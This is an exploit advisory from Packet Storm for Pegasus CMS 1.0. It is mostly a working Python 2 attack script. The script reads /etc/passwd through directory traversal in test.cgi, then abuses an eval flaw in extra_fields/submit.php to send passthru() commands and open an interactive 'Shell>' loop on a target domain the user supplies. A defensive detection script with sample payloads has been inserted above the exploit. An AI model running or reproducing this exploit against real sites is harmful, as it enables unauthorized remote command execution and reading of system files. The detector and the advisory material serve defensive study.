Pegasus CMS 1.0 Remote Code Execution

Posted Mar 14, 2019
Authored by R3zk0n

Pegasus CMS version 1.0 suffers from a code execution vulnerability in extra_fields.php.

tags | exploit, php, code execution
MD5 | 07ac9145027e1934aaa3e9418e07c540

# Exploit Title: Pegasus extra_fields.php Plugin Remote Code Execution
# Date: 14 March 2019
# Exploit Author: R3zk0n
# Vendor Homepage: https://www.wisdom.com.au/web/pegasus-cms
# Software Link: N/A
# Version: 1.0
# Tested on: Linux
# CVE : N/A

Pegasus CMS is vulnerable to directory traversal and remote code execution because of the way the extra_fields.php plugin handles its input.

The plugin can be exploited with the "safer eval" trick analysed at http://justanotherhacker.com/2016/04/analysis_of_the_safer_eval_rce_aka__the_wahckon_bug.html to obtain remote code execution.
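As an added defensive example (not part of the advisory and not Pegasus code), the following Python 3 check flags requests of the two shapes described above: a traversal sequence in the test.cgi filename parameter, and PHP call syntax or execution function names in the action value posted to extra_fields/submit.php. The endpoint paths come from the advisory; the sample requests and detection names are constructed.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Endpoint paths taken from the advisory.
TRAVERSAL_ENDPOINT = "/file/includes/template/inc/test.cgi"
RCE_ENDPOINT = "/file/includes/plugins/extra_fields/submit.php"

# PHP call syntax or execution functions have no place in an "action" field value.
PHP_INJECT = re.compile(r"[;(]|\b(passthru|system|exec|shell_exec|popen|eval|phpinfo)\b", re.I)


def _decode(value):
    # parse_qs already decoded once; decode twice more so double-encoded
    # sequences such as %252e%252e%252f are normalised before matching.
    return unquote_plus(unquote_plus(value))


def classify_request(method, path, query="", body=""):
    """Return the detection names that fire for one HTTP request."""
    findings = []
    if path.endswith(TRAVERSAL_ENDPOINT):
        for fname in parse_qs(query).get("filename", []):
            norm = _decode(fname).replace("\\", "/")
            if "../" in norm or norm.startswith("/"):
                findings.append("pegasus-test.cgi-traversal")
                break
    if method.upper() == "POST" and path.endswith(RCE_ENDPOINT):
        for action in parse_qs(body).get("action", []):
            if PHP_INJECT.search(_decode(action)):
                findings.append("pegasus-extra_fields-php-injection")
                break
    return findings


# Constructed sample requests: (method, path, query string, form body).
SAMPLE_REQUESTS = [
    ("GET", TRAVERSAL_ENDPOINT, "&filename=/../../../../etc/passwd", ""),
    ("GET", TRAVERSAL_ENDPOINT, "filename=footer.html", ""),
    ("POST", RCE_ENDPOINT, "", "action=passthru%28%22id%22%29%3Bexit%3Bphpinfo"),
    ("POST", RCE_ENDPOINT, "", "action=save"),
]


def scan(requests_):
    """Run classify_request over a list of request tuples."""
    return [(path, classify_request(m, path, q, b)) for m, path, q, b in requests_]


if __name__ == "__main__":
    for path, hits in scan(SAMPLE_REQUESTS):
        print(path, "->", hits or "clean")
```

The same checks can be expressed as WAF rules; the filename check should also be paired with server-side canonicalisation of the resolved path, and the action value should be dispatched through a fixed whitelist rather than evaluated.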

Exploit attached below:

#Eval is secure.. not really.
# These Greetz to people who are smart, Wireghoul, Nano, Silverly, m3mantra, and leostat. and z3al
# Imports missing from the original listing (Python 2 script: print statement, raw_input).
import sys
import requests

requests.packages.urllib3.disable_warnings()
banner = '''
Welcome to the DANGER ZONE.
;;J,ss,g,;
,s#@##"""77"^""77""@@Mw,
,#@#C7: ,, *^*@@@w
;@#7. ;#@#. ]ssmMMm#@@@m,
,##\` ,< ,@@@@Q ,,#@#*7` ;s@@@@@@@@@Q
;@#` ]@C ;@@@@@@@@@@"\ ;@@@@@@@@@@@@@@@m
@#\ #@@w#@@@@@@@@@@#~ @@@#M5"7j5#@@@@@@@@Q
;@C @@@@@@@@@@@@@@#\ @#\, *77@@@k
##. #@@@@@@@@@@@@@# '* {@@@
@#` a@@@@@@@@@@@@@@L *%@@
{@* ]@@@@@@@@@@@@@@#C* "@@
.@b;,s#@@@@@@@#@@#@@@@@@#C* ;s#@@@@@@m, j@b
@@@#@@@@@@@@@@@@@@@@@@#C =* ,ppJJs#@@@@@@@@@@@@@k @@
@#1@@@@@@@@@@@@@@@@#W~ ;@QQ@@@@@@@@@#` `|7@@@@~ ]@p
@[ @@5"@@@@@@@@@@#~ s@@@@@####@@@@@#\ @@@b ]@b
@[ @ j@@@@@@@@~]#"7 "@@#"\ 7@@C @@@b ]@b
@@ @@@@@@@@@@c ^@@ ]@ ,@@@# @@b
@@~ @ @@@@@@@@@@@b @# a@@@@" ]@@
j@Q @@@@@@@@@@@@@@@@o ,J ]\ s@@@@#"` ]@@L
]@b ]@@@@@@@@@@@@@@@@o ,@@@@> ;@@@@@#^ #@@#
@@Q """%*577"%@@@@@@# ]@@@@@C ;@@@@#C ;@@@#*
%@m @@@@@@@ .@@@@@# {@@@@@> s@@@@#*
7@@ @@M@@@@@k ^@@@"# @@@@@@@@@@@@@@@#
*@@m @@bj@@@b@@@o|"^]# %@@@@@@#M7@@#^
7@@m "# @@# @@7@@@@@@~ ^||:`,#@#C
^%@@m j @b j# \@@@@@@ ,#@@#
`7@@@mJ 7 ' |%@@@@@m, -g,ss#@@@@#C
`7%@@@Mm, `7"%####@@MMMM#@@@#M7.
^7@@@@@@@@@@@@@@@@@@@@#MT^:
`~^"7""""7^\*:
Chimeria Exploit.
pegausCMS Exploit's.
'''

print banner

raw_url = raw_input("Please enter a domain name: \n")

# Request headers shared by the GET and POST requests below.
BROWSER_HEADERS = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Connection": "close",
    "Cache-Control": "max-age=0",
}
XHR_HEADERS = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Accept-Language": "en-US,en;q=0.5",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Connection": "close",
}
SUBMIT_PATH = "/file/includes/plugins/extra_fields/submit.php"


def dir_Trav(raw_url):
    # Directory traversal check through the test.cgi filename parameter.
    print "Checking for directory traversal..\n"
    dir_list = requests.get(
        "https://www." + raw_url + "/file/includes/template/inc/test.cgi?&filename=/../../../../../../../../etc/passwd",
        headers=BROWSER_HEADERS)
    print dir_list.content
    return


print "Trying to execute directory traversal"
dir_Trav(raw_url)
r = requests.get("http://" + raw_url)
print "Checking Status code: %s" % r.status_code
if r.status_code == 200:
    print "Connected"
    print "Checking is using vulnerable CMS."
    vuln = "http://" + raw_url + "/file/includes/plugins/globalFields/submit.php"
    b = requests.get(vuln)
    print "Checking CMS Status: %s " % b.status_code
    if b.status_code == 200:
        print "Seems exploitable.. Lets try to list the files!"
        print raw_url
        # The action value follows the safer-eval trick linked above.
        list_files = requests.post("http://www." + raw_url + SUBMIT_PATH, headers=XHR_HEADERS,
                                   data={"action": "passthru(\"ls -lah\");exit;phpinfo"})
        print list_files.content
        status = list_files.status_code
        while status == 200:
            try:
                ShellCheck = raw_input("Shell>").strip()
                Shell = requests.post("http://www." + raw_url + SUBMIT_PATH, headers=XHR_HEADERS,
                                      data={"action": "passthru(\"{}\");exit;phpinfo".format(ShellCheck)})
                print Shell.content
                if ShellCheck == "exit":
                    sys.exit(0)
            except KeyboardInterrupt:
                print "You exited, bye"
                sys.exit(0)
    else:
        print "Connected but does not seem exploitable. \n"
        print "Bye!!!!!!!!!! \n"
else:
    print "Not connected"

packet storm

© 2019 Packet Storm. All rights reserved.